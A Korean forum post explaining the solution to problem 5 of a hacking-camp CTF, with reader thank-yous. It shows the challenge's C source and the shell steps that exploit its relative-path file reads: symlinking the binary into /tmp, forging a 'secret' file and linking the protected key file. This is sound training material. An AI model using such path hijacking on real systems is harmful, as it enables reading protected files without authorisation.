1586,

1/80

lMaxl04

http://lmaxl.tistory.com/

해킹캠프 ctf 5번 풀이.

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1572 [복사]

우선 문제를 보면 봄 문제이다. 박봄인가...?
내스타일이 아니라서 풀기 싫지만 요청으로 한번...

---------------------------------------------------------------------------------------
is this a right file 이라는 힌트가 있다.
무슨 말인지 솔직히 잘 모르겠음...

접속하면 파일이 4개가 있는데 소스파일을 열어보자.

#include <stdio.h>

int main()
{
        FILE *fp;
        char szStr[1024];

        fp = fopen("secret", "r");
        if(!fp){
                printf("secret file error\n");
                exit(-1);
        }

        fgets(szStr, 1024, fp);
        szStr[strlen(szStr)-1] = 0;
        fclose(fp);

        if(strcmp(szStr, "tell me your secret!") == 0)
                system("/bin/cat key");

        printf("Finished.\n");
}

간단하게 해석하면 secret 에서 읽어온 스트링이 tell me your secret! 면 키 파일을 읽어라 라는 것이다. (자세한 소스 해석은 알아서...)

그런데 secret 파일에는
I'm a invalid secret file
이라는 스트링이 들어있고 읽기 권한만 있어 수정이 불가능하다.

그럼 다른데서 읽으면 되지 않겠나 싶어서 심볼릭 링크를 이용해보았다.

tmp 폴더에 다음과 같이 프로그램의 심볼릭 링크를 건다.

bom@ubuntu:/tmp/max$ ln -s /home/bom/bom_owned aa

그럼 이제 tmp 폴더에 다음과 같은 파일이 있을 것이다.

lrwxrwxrwx  1 bom  bom    19 2010-09-18 18:35 aa -> /home/bom/bom_owned*

심볼릭 링크는 간단히 생각하면 인터넷의 즐겨찾기와 동일한 것으로
파일이 원래 파일을 가리키며 해당 파일 실행시 원본 파일을 실행하는 파일이라고 보면 된다.

또한 원래 목적이 secret 파일을 읽는데 여기서 보면 절대 경로가 아닌 상대경로를 이용해 참고한다.
즉 /home/bom/secret 이 아닌 프로그램이 존재하는 폴더 내의 secret을 읽는 것이다.

그러므로 secret 파일도 다음과 같이 만들어준다.
bom@ubuntu:/tmp/max$ cat > secret
tell me your secret!

자 이제 실행해보자.

bom@ubuntu:/tmp/max$ ./aa
/bin/cat: key: No such file or directory
Finished.

실행은 잘 되었는데 key파일을 읽으려고 하니 없다고 그런다.
그러므로 키 파일을 만들어주자.
이때도 마찬가지로 소스를 보면 /bin/cat key 로써 절대 경로가 아닌 상대경로로 파일을 읽기 때문에 심볼릭 링크를 이용해 key 파일을 만들어야 한다.

bom@ubuntu:/tmp/max$ ln -s /home/bom/key key

이제 디렉토리 내의 전체 파일은 다음과 같다.

lrwxrwxrwx  1 bom  bom    19 2010-09-18 18:35 aa -> /home/bom/bom_owned*
lrwxrwxrwx  1 bom  bom    13 2010-09-18 18:36 key -> /home/bom/key
-rw-r--r--  1 bom  bom    21 2010-09-18 18:35 secret

이제 aa를 실행하면 내스타일은 아니지만 봄도 내꺼.

Hit : 6779 Date : 2010/09/18 06:19


DeathStalker	맥스형 고마워 ㅎㅎ 덕분에 공부 됬어 ㅎㅎ	2010/09/18
ganesha	고맙습니다 잘 보고 갑니다 ㅎㅎ	2010/09/19
williamlee	오 감사!	2010/09/19